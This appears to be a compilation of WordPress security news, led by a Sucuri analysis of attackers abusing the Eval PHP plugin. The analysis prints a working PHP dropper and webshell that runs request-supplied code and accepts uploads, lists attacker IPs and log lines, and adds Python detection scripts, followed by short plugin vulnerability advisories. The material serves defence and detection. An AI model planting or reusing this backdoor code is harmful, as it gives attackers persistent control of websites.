Massive Abuse of Abandoned Eval PHP WordPress Plugin

Attackers are always finding new and creative ways to compromise websites and maintain their foothold in environments. This is frequently done via the use of backdoors: PHP scripts designed to allow attackers access and control even after you’ve changed your passwords and thought that the worst was over.

Since external scans are unable to see website backdoors, they can often be identified through the usage of server-side scans and file-integrity monitoring, which we offer as part of our services. This is also offered through a number of available WordPress security plugins that can be used on your website.

However, we recently started observing attackers making use of an unorthodox type of backdoor and reinfection method which would go completely undetected if website monitoring doesn’t happen to include the database.

Conventional backdoors

Almost all of the time website backdoors are coded in the PHP programming language: the backbone of the modern web. WordPress itself (making up over 40% of the web) is largely PHP based, as are most other major CMS platforms like Joomla, Magento and others. PHP is an incredibly versatile language, which also means that it can be misused by attackers. One of the most common (mis)usages by attackers is backdoors.

According to our recent 2022 Website Threat Report, remote code execution backdoors, webshells, and uploaders are the backdoor types attackers most often deploy to infected environments:

Backdoor category distribution as seen in the 2022 website threat report

However, with good file integrity monitoring and server side scanning, backdoors can be effectively monitored for, detected, and removed to keep your websites safe from further attacks.

Database injections

Over the last few weeks we noticed that some infected website’s databases were being injected with the following code into the wp_posts table:




[evalphp]file_put_contents($_SERVER['DOCUMENT_ROOT'].'/7299b0773c8d.php','<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo "ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>');[/evalphp]

This code is quite simple: it uses the file_put_contents function to write a PHP script containing the specified remote code execution backdoor into the docroot of the website. The dropped script is gated by an md5 check on the d cookie; once that matches it eval()s base64-decoded PHP taken from the id request parameter and, if up=up is posted, saves an uploaded file under its original name. All the attacker needs to do is visit one of the infected posts or pages and the backdoor will be written into the file structure.

It’s not exactly a new backdoor, however; more conventional PHP backdoors of this variety were found as early as last summer and over 6,000 instances of this backdoor were cleaned from compromised sites in the last 6 months alone. However, the backdoor being injected into the database is certainly a new and interesting development.

Misuse of legitimate plugin

In the code sample above you may notice the [evalphp] WordPress shortcodes (small code tags used in WordPress environments that make it easy to add complex functionality to your website). These are related to a very old WordPress plugin available in the official repository with the same name Eval PHP:

Eval PHP WordPress plugin which leads to website infection

This plugin allows PHP code to be inserted into pages and posts of WordPress sites and then executed every time the posts are opened in a browser. What could go wrong, right?

It hasn’t been updated in over a decade and has very few real active installations. However, we can see that since the beginning of April it has surged in popularity:

Downloads per day for EvalPHP

For the ten years leading up to the end of March 2023, this plugin rarely saw even one download a day. But around March 29, 2023 we saw daily downloads spike to 7,000. After that, every single day we have seen 3k-5k downloads, with over 100,000 downloads total.

EvalPHP WordPress plugin downloads history for April 18, 2023

This WordPress data correlates to our own logs, where we see that starting March 29, 2023, some attackers started installing the EvalPHP plugin on compromised sites and using it to create the earlier mentioned backdoors.

Malicious requests

In all cases the requests originate from these three IP addresses:

  1. 91.193.43.151 – AEZA-AS, RU
  2. 79.137.206.177 – AEZA-AS, RU
  3. 212.113.119.6 – AEZA-AS, RU

79.137.206.177 - - [08/Apr/2023:07:28:21 -0700] "PUT /wp-json/wp/v2/plugins/evalphp/evalphp/?status=active HTTP/1.1" 200 635 "http://<redacted>.com/wp-json/wp/v2/plugins" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 613

79.137.206.177 - - [08/Apr/2023:07:28:30 -0700] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 2029 "http://<redacted>.com/wp-json/wp/v2/plugins/evalphp/evalphp/?status=active" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 504

79.137.206.177 - - [08/Apr/2023:07:28:31 -0700] "GET /3e9c0ca6bbe9.php HTTP/1.1" 200 27 "http://<redacted>.com/wp-json/wp/v2/pages" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36" 17

Here you can see a sequence of requests that:

  1. Checks to make sure that the Eval PHP plugin is active.
  2. Creates a page with malware inside the [evalphp] shortcodes. That is enough to execute the PHP code and drop the 3e9c0ca6bbe9.php backdoor (the filename is unique for each environment) in the site root.
  3. Accesses the newly dropped backdoor.

Since the backdoor reads the PHP code to execute from $_REQUEST[id], the attacker doesn't need a POST request to keep the parameters out of the access logs: $_REQUEST merges the contents of $_GET, $_POST and $_COOKIE, so the payload (and the d cookie that unlocks the backdoor) can be sent as cookies on a plain GET.

GET requests without visible parameters look less suspicious than POST requests. But in the case of this backdoor, GET can be equally dangerous.
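Because the backdoor's own requests look like bare GETs, the access log is more useful for spotting the REST API sequence that precedes them. The following is an added example, not code from the Sucuri post: it parses combined-format log lines and flags, per client IP, a successful Eval PHP activation followed by page/post creation and the first hit on a randomly named .php file in the docroot. The log lines are constructed to mirror the excerpt above (example.invalid is a placeholder hostname), and the ten-minute correlation window is an assumption.

```python
"""Flag the Eval PHP abuse chain in a web server access log (added example)."""
import re
from datetime import datetime, timedelta

# Combined log format: ip ident user [ts] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ACTIVATE_RE = re.compile(r'^/wp-json/wp/v2/plugins/evalphp/evalphp/?\?status=active$')
CREATE_RE = re.compile(r'^/wp-json/wp/v2/(?:pages|posts)/?$')
DROPPED_RE = re.compile(r'^/[0-9a-f]{12}\.php$')  # hex-named PHP file in the site root


def parse_line(line):
    """Return the fields we need from one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        'ip': m['ip'],
        'ts': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
        'method': m['method'],
        'path': m['path'],
        'status': int(m['status']),
    }


def find_evalphp_chains(lines, window=timedelta(minutes=10)):
    """One finding per successful Eval PHP activation, recording how far the chain got."""
    by_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip.setdefault(rec['ip'], []).append(rec)

    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r['ts'])
        for i, act in enumerate(recs):
            if not (act['method'] == 'PUT' and act['status'] == 200
                    and ACTIVATE_RE.match(act['path'])):
                continue
            stage, dropped = 'plugin_activated', None
            for r in recs[i + 1:]:
                if r['ts'] - act['ts'] > window:
                    break
                if r['method'] == 'POST' and r['status'] == 201 and CREATE_RE.match(r['path']):
                    stage = 'content_created'
                elif (stage == 'content_created' and r['method'] == 'GET'
                      and r['status'] == 200 and DROPPED_RE.match(r['path'])):
                    stage, dropped = 'backdoor_hit', r['path']
                    break
            findings.append({'ip': ip, 'activated_at': act['ts'],
                             'stage': stage, 'dropped_file': dropped})
    return findings


UA = '"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2902.99 Safari/537.36"'
SAMPLE_LOG = [  # constructed lines modelled on the post's excerpt; hostname is a placeholder
    '79.137.206.177 - - [08/Apr/2023:07:28:21 -0700] "PUT /wp-json/wp/v2/plugins/evalphp/evalphp/?status=active HTTP/1.1" 200 635 "http://example.invalid/wp-json/wp/v2/plugins" ' + UA + ' 613',
    '79.137.206.177 - - [08/Apr/2023:07:28:30 -0700] "POST /wp-json/wp/v2/pages HTTP/1.1" 201 2029 "http://example.invalid/wp-json/wp/v2/plugins/evalphp/evalphp/?status=active" ' + UA + ' 504',
    '79.137.206.177 - - [08/Apr/2023:07:28:31 -0700] "GET /3e9c0ca6bbe9.php HTTP/1.1" 200 27 "http://example.invalid/wp-json/wp/v2/pages" ' + UA + ' 17',
    '203.0.113.9 - - [08/Apr/2023:07:29:02 -0700] "GET /wp-login.php HTTP/1.1" 200 4321 "-" ' + UA + ' 12',
]

if __name__ == '__main__':
    for f in find_evalphp_chains(SAMPLE_LOG):
        print(f"{f['ip']}: Eval PHP activated at {f['activated_at']:%Y-%m-%d %H:%M:%S}, "
              f"stage={f['stage']}, dropped_file={f['dropped_file']}")
```

A plugin activation that never reaches the third stage is still worth a look, which is why the scanner reports the stage reached rather than only complete chains; an activation by an account you recognise, from an address you expect, is the benign case to rule out.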

Pages with evalphp malware

In our experience, hackers sometimes create a test page (new pages are not displayed on the home page by default) with the slug publish (on a typical WordPress site the URL will be <site-domain>.com/publish/) and the word “Test” as its only content.

JSON from test page created by backdoor

However, the real backdoors are created in multiple posts that are saved as drafts and not publicly visible at all. Because of the way the Eval PHP plugin works, it’s enough to save a page as a draft in order to execute the PHP code inside the [evalphp] shortcodes.

This is how these page drafts look in the SQL dump of the wp_posts table:

SQL dump WP Posts from PHP Eval wordpress plugin

In all cases, attackers were able to successfully log into WordPress admin. And the malicious pages are created with a real site administrator as their author. However, on some of the compromised sites we found created malicious admin users with random names and outlook.com emails, for example: 5faf461e / 5faf461e@outlook[.]com, df8a6aa9 / df8a6aa9@outlook[.]com, etc.
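Since the dropper lives in wp_posts and the rogue accounts in wp_users, a cleanup has to query the database, not just the file system. The following is an added example, not code from the Sucuri post: it builds an in-memory SQLite stand-in for wp_posts, wp_users and wp_usermeta, loads constructed rows modelled on the observations above (one draft page carrying the dropper, the “Test” page with slug publish, a clean post, a legitimate administrator and one with an eight-hex-character login and matching outlook.com address), and reports every [evalphp] block regardless of post_status together with the behaviours inside it. The wp_ table prefix and the indicator list are assumptions; on a real site the same queries run against MySQL.

```python
"""Scan a WordPress database for Eval PHP droppers and rogue admin users (added example)."""
import re
import sqlite3

SHORTCODE_RE = re.compile(r'\[evalphp\](.*?)\[/evalphp\]', re.S | re.I)
# Judge the shortcode body by what it does, not by an exact signature.
INDICATORS = {
    'writes_file':   re.compile(r'\b(?:file_put_contents|fwrite|copy)\s*\('),
    'dynamic_eval':  re.compile(r'\b(?:eval|assert|create_function)\s*\('),
    'decodes_input': re.compile(r'\bbase64_decode\s*\('),
    'reads_request': re.compile(r'\$_(?:REQUEST|GET|POST|COOKIE|FILES)\b'),
    'md5_gate':      re.compile(r'\bmd5\s*\(\s*\$_COOKIE'),
}
DROP_TARGET_RE = re.compile(
    r'''file_put_contents\s*\(\s*\$_SERVER\[['"]DOCUMENT_ROOT['"]\]\s*\.\s*['"]([^'"]+)['"]''')
ROGUE_LOGIN_RE = re.compile(r'^[0-9a-f]{8}$')  # pattern of the rogue admin names seen in the post

# The dropper from the post, as it sits in post_content.
DROPPER = ("[evalphp]file_put_contents($_SERVER['DOCUMENT_ROOT'].'/7299b0773c8d.php',"
           "'<?=409723*20;if(md5($_COOKIE[d])==\"17028f487cb2a84607646da3ad3878ec\"){echo \"ok\";"
           "eval(base64_decode($_REQUEST[id]));if($_POST[\"up\"]==\"up\"){@copy($_FILES[\"file\"]"
           "[\"tmp_name\"],$_FILES[\"file\"][\"name\"]);}}?>');[/evalphp]")

# Constructed rows.  wp_posts: (ID, post_author, post_status, post_name, post_type, post_content)
SAMPLE_POSTS = [
    (101, 1, 'publish', 'hello-world', 'post', 'Welcome to our site.'),
    (102, 1, 'publish', 'publish', 'page', 'Test'),
    (103, 1, 'draft', 'untitled', 'page', DROPPER),
    (104, 1, 'draft', 'notes', 'post', 'Meeting notes [gallery ids="1,2"]'),
]
# wp_users: (ID, user_login, user_email); wp_usermeta: (user_id, meta_key, meta_value)
SAMPLE_USERS = [(1, 'alice', 'alice@example.invalid'), (7, '5faf461e', '5faf461e@outlook.com')]
SAMPLE_USERMETA = [(1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
                   (7, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')]


def load_db(posts=SAMPLE_POSTS, users=SAMPLE_USERS, usermeta=SAMPLE_USERMETA):
    """In-memory SQLite stand-in for the three WordPress tables the checks need."""
    conn = sqlite3.connect(':memory:')
    conn.executescript('''
        CREATE TABLE wp_posts (ID INTEGER, post_author INTEGER, post_status TEXT,
                               post_name TEXT, post_type TEXT, post_content TEXT);
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    ''')
    conn.executemany('INSERT INTO wp_posts VALUES (?,?,?,?,?,?)', posts)
    conn.executemany('INSERT INTO wp_users VALUES (?,?,?)', users)
    conn.executemany('INSERT INTO wp_usermeta VALUES (?,?,?)', usermeta)
    return conn


def analyze_shortcode(body):
    """Which dangerous behaviours a shortcode body shows, and the file it drops, if any."""
    found = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
    m = DROP_TARGET_RE.search(body)
    return {'indicators': found, 'drops': m.group(1) if m else None}


def scan_posts(conn):
    """Every [evalphp] block in wp_posts.  No post_status filter: drafts execute too."""
    rows = conn.execute("SELECT ID, post_author, post_status, post_name, post_type, post_content "
                        "FROM wp_posts WHERE post_content LIKE '%[evalphp]%'")
    findings = []
    for pid, author, status, slug, ptype, content in rows:
        for body in SHORTCODE_RE.findall(content):
            f = analyze_shortcode(body)
            f.update(ID=pid, author=author, status=status, slug=slug, type=ptype)
            findings.append(f)
    return findings


def canary_pages(conn):
    """The 'publish' slug / 'Test' body page the attackers use to confirm execution."""
    rows = conn.execute("SELECT ID FROM wp_posts WHERE post_name='publish' AND trim(post_content)='Test'")
    return [r[0] for r in rows]


def rogue_admins(conn):
    """Administrators whose login is eight hex characters reused as an outlook.com local part."""
    rows = conn.execute("SELECT u.ID, u.user_login, u.user_email FROM wp_users u "
                        "JOIN wp_usermeta m ON m.user_id = u.ID "
                        "WHERE m.meta_key LIKE '%capabilities' AND m.meta_value LIKE '%administrator%'")
    return [(uid, login, email) for uid, login, email in rows
            if ROGUE_LOGIN_RE.match(login) and email.lower() == f'{login}@outlook.com']


if __name__ == '__main__':
    db = load_db()
    for f in scan_posts(db):
        print(f"post {f['ID']} ({f['status']}, /{f['slug']}/): {f['indicators']} drops {f['drops']}")
    print('canary pages:', canary_pages(db), 'rogue admins:', rogue_admins(db))
```

The indicator regexes are deliberately behavioural (file write, dynamic eval, attacker-controlled input) so that a reworded dropper with a different filename or hash still trips them; the canary and rogue-admin checks are exact matches on the patterns reported in the post and should be widened to fit what your own logs show.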

The compromised sites sometimes have the same backdoor installed in other files. Most often we find it in /wp-content/plugins/background-image-cropper/accesson.php; in logs we see hackers uploading a custom version of the legitimate background-image-cropper plugin. We also find it in the theme’s functions.php file when attackers modify this file using the WordPress theme editor.

Why are attackers putting backdoors into wp_posts?

You might be wondering why the attackers would choose this new tactic of injecting backdoors into compromised website environments rather than just sticking with good old fashioned PHP backdoors.

Although the injection in question does drop a conventional backdoor into the file structure, the combination of a legitimate plugin and a backdoor dropper in a WordPress post allows them to easily reinfect the website and stay hidden — all they need to do is to visit a “benign” web page.

Fortunately, some WordPress security plugins such as our Sucuri Scanner do log administrator activity within a website, such as plugin installations and changes to pages/posts which would be a symptom of this attack. If you notice the Eval PHP plugin installed on your website and it wasn’t you who did it then there’s a good chance that your website has been compromised.

Potentially dangerous plugins in WordPress repository

At this point, WordPress has a warning when you open the EvalPHP page in the official plugin repository:

This plugin hasn’t been tested with the latest 3 major releases of WordPress. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.

However, this may not be enough for plugins that can be easily abused. Maybe such plugins should be completely delisted, especially when they are not updated for 10+ years and have a really small legitimate user base.

EvalPHP is not the only plugin like this. You can find other similar plugins in the official WordPress plugin repository. For example:

Example of deprecated PHPEval wordpress plugin

This PHPEval plugin hasn’t been updated for 11+ years and has 40+ active users. Is there a reason to keep it in the repository after so many years of inactivity? And by the way, we can see an increased interest in this plugin during the last week…

Keeping such plugins in the official repository makes it easier for hackers to stay under the radar, since they can install a legitimate unmodified plugin from a reputable source instead of installing fake plugins or modifying existing plugins, which can be detected by scanners that monitor the integrity of known plugins.

Mitigation steps to protect your environment

In checking logs from environments affected by these backdoors, in every case so far the attackers already had established administrator access to the website, which allowed them to install the evalphp plugin within the environment.

This is a testament to how crucially important it is to secure the wp-admin panel of your WordPress environment as well as monitor any administrator activity taking place. In addition to regular file cleanup and changing passwords, don’t forget to review your WordPress users and pages — some of them may have been created by hackers.

Other steps to mitigate risk from infection include:

Source: https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html

Critical Security Update: Directorist WordPress Plugin Patches Two High-risk Vulnerabilities

On April 3, 2023, the Wordfence team uncovered two significant vulnerabilities – an Arbitrary User Password Reset to Privilege Escalation, and an Insecure Direct Object Reference leading to Arbitrary Post Deletion. Both vulnerabilities were found to affect Directorist versions 7.5.4 and earlier.

Sites using the free version of Wordfence received a firewall rule to protect against any exploits targeting these vulnerabilities on May 4, 2023.

Unfortunately, on June 1, 2023, the plugin was closed due to developer unresponsiveness, and it currently remains unavailable for download from the repository. This presents an issue as site owners are unable to request an update directly via their WordPress dashboard. Given this situation, we advise site owners to either temporarily uninstall the plugin, or manually download the patched version, 7.5.5, directly from the developer’s site and upload it to their sites for optimal protection. For this reason, we have intentionally kept specific vulnerability details to a minimum in this post.

Source and more details: https://www.wordfence.com/blog/2023/06/critical-security-update-directorist-wordpress-plugin-patches-two-high-risk-vulnerabilities/

Credential-Stealing Server Side Request Forgery Patched in Getwid

On April 6, 2023, the Wordfence Threat Intelligence team initiated the responsible disclosure process for two vulnerabilities in Getwid – Gutenberg Blocks, a plugin installed on over 50,000 WordPress sites. The plugin’s developers responded immediately, and we sent over the full disclosure the same day. A patched version of the plugin, 1.8.4, was released on April 13, 2023.

The most serious vulnerability had a high severity because it allows authenticated users to perform Server Side Request Forgery (SSRF), which can result in full access to the hosted instance on some cloud configurations. Additionally, it may allow further penetration into internal networks in some enterprise configurations. The other vulnerability is much lower in severity and allows authenticated users to clear and update the site’s template cache.

All Wordfence customers received a firewall rule protecting against the Server Side Request Forgery (SSRF) by May 6, 2023.

Source and more details: https://www.wordfence.com/blog/2023/06/credential-stealing-server-side-request-forgery-patched-in-getwid/

Arbitrary Plugin Installation Vulnerability In Formidable Forms

During a recent internal review of the Formidable Forms plugin, a serious security issue was detected which could potentially enable users with low privileges such as subscribers to install arbitrary plugins on vulnerable sites.

The exploitation of this vulnerability could grant malicious users the power to install any plugin available on downloads.wordpress.org, which can lead to a wide variety of attacks, including the upload of malicious content, creation of administrative users, or even a full site takeover.

WPScan reported the vulnerability to the authors of the plugin, who have responded by releasing Formidable Forms version 6.3.1 to mitigate this threat. We strongly advise that you update the affected plugin to this latest version and ensure you have robust security measures in place.

Source and more details: https://blog.wpscan.com/arbitrary-plugin-installation-vulnerability-in-formidable-forms/

WPDeveloper Addresses Privilege Escalation Vulnerability in ReviewX WordPress Plugin

On May 20, 2023, the Wordfence Threat Intelligence team identified and began the responsible disclosure process for a Privilege Escalation vulnerability in WPDeveloper’s ReviewX plugin, which is actively installed on more than 10,000 WordPress websites. This vulnerability makes it possible for an authenticated attacker to grant themselves administrative privileges via a user meta update.

Wordfence Premium users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023.

Wordfence contacted WPDeveloper on May 20, 2023, and received a response the next day. After providing full disclosure details, the developer released a patch on May 22, 2023. We would like to commend the WPDeveloper development team for their prompt response and timely patch, which was released in just one day.

We urge users to update their sites with the latest patched version of ReviewX, which is version 1.6.14 at the time of this writing, as soon as possible.

Source and more details: https://www.wordfence.com/blog/2023/05/wpdeveloper-addresses-privilege-escalation-vulnerability-in-reviewx-wordpress-plugin/

Massive Balada Injector campaign attacking WordPress sites since 2017

An estimated one million WordPress websites have been compromised during a long-lasting campaign that exploits “all known and recently discovered theme and plugin vulnerabilities” to inject a Linux backdoor that researchers named Balada Injector.

The campaign has been running since 2017 and aims mostly to redirect to fake tech support pages, fraudulent lottery wins, and push notification scams.

According to website security company Sucuri, the Balada Injector campaign is the same one that Dr. Web reported in December 2022 to leverage known flaws in several plugins and themes to plant a backdoor.

Long-running campaign

Sucuri reports that Balada Injector attacks in waves occurring once a month or so, each using a freshly registered domain name to evade blocking lists.

Usually, the malware exploits newly disclosed vulnerabilities and develops custom attack routines around the flaw it targets.

Targeted add-ons from a specific infection wave (Sucuri)

Injection methods observed by Sucuri over the years include siteurl hacks, HTML injections, database injections, and arbitrary file injections.

This plethora of attack vectors has also created duplicate site infections, with subsequent waves targeting already compromised sites. Sucuri highlights a case of a site that was attacked 311 times with 11 distinct versions of Balada.

Typical Balada injection (Sucuri)

Post-infection activity

Balada’s scripts focus on exfiltrating sensitive information like database credentials from wp-config.php files, so even if the site owner clears an infection and patches their add-ons, the threat actor maintains their access.

The campaign also seeks backup archives and databases, access logs, debug info, and files that might contain sensitive information. Sucuri says the threat actor frequently refreshes the list of targeted files.

Moreover, the malware looks for the presence of database administration tools like Adminer and phpMyAdmin. If these tools are vulnerable or misconfigured, they could be used to create new admin users, extract information from the site, or to inject persistent malware onto the database.

If these direct breach pathways are unavailable, the attackers turn to brute-forcing the admin password by trying out a set of 74 credentials.

Balada backdoors

The Balada Injector plants multiple backdoors on compromised WordPress sites for redundancy, which act as hidden access points for the attackers.

Sucuri reports that at some point in 2020, Balada was dropping backdoors to 176 predefined paths, making the complete removal of the backdoor very challenging.

Excerpt of backdoor paths list (Sucuri)

Also, the names of the planted backdoors changed in each campaign wave to make detections and removals harder for website owners.

The researchers say that Balada injectors are not present on every compromised site, since that many clients would be a tough challenge to manage. They believe that the hackers uploaded the malware on websites “hosted on private or virtual private servers that show signs of not being properly managed or neglected.”

From there, the injectors scan for websites that share the same server account and file permissions and search them for writable directories, starting from higher-privileged directories, to perform cross-site infections.

This approach allows the threat actors to easily compromise several sites at one go and quickly spread their backdoors while having to manage a minimal number of injectors.

Moreover, cross-site infections enable the attackers to re-infect cleaned-up sites repeatedly, as long as access to the VPS is maintained.

Sucuri notes that defending against Balada Injector attacks may differ from one case to another and that there is no one specific set of instructions admins can follow to keep the threat at bay, due to the wide variety of infection vectors.

However, Sucuri’s general WordPress malware cleanup guides should be enough to block most of the attempts.

Keeping all the website software updated, using strong, unique passwords, implementing two-factor authentication, and adding file integrity systems should work well enough to protect sites from compromise.

Source: https://www.bleepingcomputer.com/news/security/massive-balada-injector-campaign-attacking-wordpress-sites-since-2017/

Wordfence Firewall Blocks Bizarre Large-Scale XSS Campaign

The Wordfence Threat Intelligence team has been monitoring an increase in attacks targeting a Cross-Site Scripting vulnerability in Beautiful Cookie Consent Banner, a WordPress plugin installed on over 40,000 sites. The vulnerability, which was fully patched in January in version 2.10.2, offers unauthenticated attackers the ability to add malicious JavaScript to a website, potentially allowing redirects to malvertizing sites as well as the creation of malicious admin users, both of which are appealing use cases for attackers.

All Wordfence sites are protected against this vulnerability by the Wordfence Firewall’s built-in Cross-Site Scripting protection. Note that since this vulnerability did not require a separate firewall rule, statistics for it are not currently publicly available on Wordfence Intelligence, as they are aggregated under the general Cross-Site Scripting chart, where it currently accounts for roughly two-thirds of all attacks blocked by the rule.

According to Wordfence records, the vulnerability has been actively attacked since February 5, 2023, but this is the largest attack against it that they have seen. Wordfence has blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing.

It is believed that this is the work of a single actor, as every single attack contained a partial payload of onmouseenter=" and no further functioning JavaScript. It is likely that this set of attacks is being performed using a misconfigured exploit that expects a customized payload, and that the attacker has simply failed to provide one.

Despite this fact, if your website is running a vulnerable version of the plugin and you are not currently using Wordfence or another Web Application Firewall, these attacks do have the potential to corrupt the configuration of the plugin which can break its intended functionality, so we still recommend updating to the latest version, which is 2.13.0 at the time of this writing, as soon as possible.

Source and more details: https://www.wordfence.com/blog/2023/05/wordfence-firewall-blocks-bizarre-large-scale-xss-campaign

WordPress 6.2.2 Security Release

The 6.2.2 minor release addresses 1 bug and 1 security issue. Because this is a security release, it is recommended that you update your sites immediately. All versions since WordPress 5.9 have also been updated.

WordPress 6.2.2 is a rapid response release to address a regression in 6.2.1 and further patch a vulnerability addressed in 6.2.1. The next major release will be version 6.3 planned for August 2023.

The update process will begin automatically if you have sites that support automatic background updates.

You can download WordPress 6.2.2 from WordPress.org or visit your WordPress Dashboard, click “Updates,” and click “Update Now.”

Full info: https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/

W3 Eden Addresses Authenticated Stored XSS Vulnerability in Download Manager WordPress Plugin

The Wordfence Threat Intelligence team identified a stored Cross-Site Scripting (XSS) vulnerability in W3 Eden’s Download Manager plugin, which is actively installed on more than 100,000 WordPress websites, making it one of the most popular download management plugins. The vulnerability enables threat actors with contributor-level permissions or higher to inject malicious web scripts into pages using the plugin’s shortcode.

All Wordfence customers are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.

The developer released a patch on May 1, 2023. We would like to commend the W3 Eden development team for their prompt response and timely patch.

We urge users to update their sites with the latest patched version of Download Manager, version 3.2.71 at the time of this writing, as soon as possible.

Source and more details: https://www.wordfence.com/blog/2023/05/w3-eden-addresses-authenticated-stored-xss-vulnerability-in-download-manager-wordpress-plugin

Vulnerability in WordPress Google Analytics Plugin Hits +3 Million Websites

MonsterInsights Google Analytics WordPress plugin XSS vulnerability affects up to +3 million websites.

The National Vulnerability Database announced that a popular Google Analytics WordPress plugin installed on over 3 million sites was discovered to contain a Stored Cross-Site Scripting (XSS) vulnerability.

Stored XSS

A Cross-Site Scripting (XSS) attack generally occurs when a part of the website that accepts user input is insecure and allows unanticipated input, like scripts or links.

The XSS vulnerability can be leveraged to obtain unauthorized access to a website and can lead to user data theft or a full site takeover.

The non-profit Open Worldwide Application Security Project (OWASP) describes how the XSS vulnerability works:

“An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script.

Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.”

A stored XSS, which is arguably worse, is one in which the malicious script is stored on the website’s own server.

The plugin, MonsterInsights – Google Analytics Dashboard for WordPress, was discovered to have the stored XSS version of the vulnerability.

MonsterInsights – Google Analytics Dashboard for WordPress Vulnerability

The MonsterInsights Google Analytics plugin is installed in over three million websites, which makes this vulnerability more concerning.

WordPress Security company, Patchstack, which discovered the vulnerability, published details:

“Rafie Muhammad (Patchstack) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Google Analytics by MonsterInsights Plugin.

This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site.

This vulnerability has been fixed in version 8.14.1.”

Recommended Action

Patchstack recommends that all users of the MonsterInsights Analytics Plugin update their WordPress plugin immediately to the latest version or at least version 8.14.1.

Read the U.S. National Vulnerability Database announcement:

CVE-2023-23999 Detail

Read Patchstack’s announcement:

WordPress Google Analytics by MonsterInsights Plugin <= 8.14.0 is vulnerable to Cross Site Scripting (XSS)

As published in https://www.searchenginejournal.com/monsterinsights-wordpress-plugin-vulnerability/487510/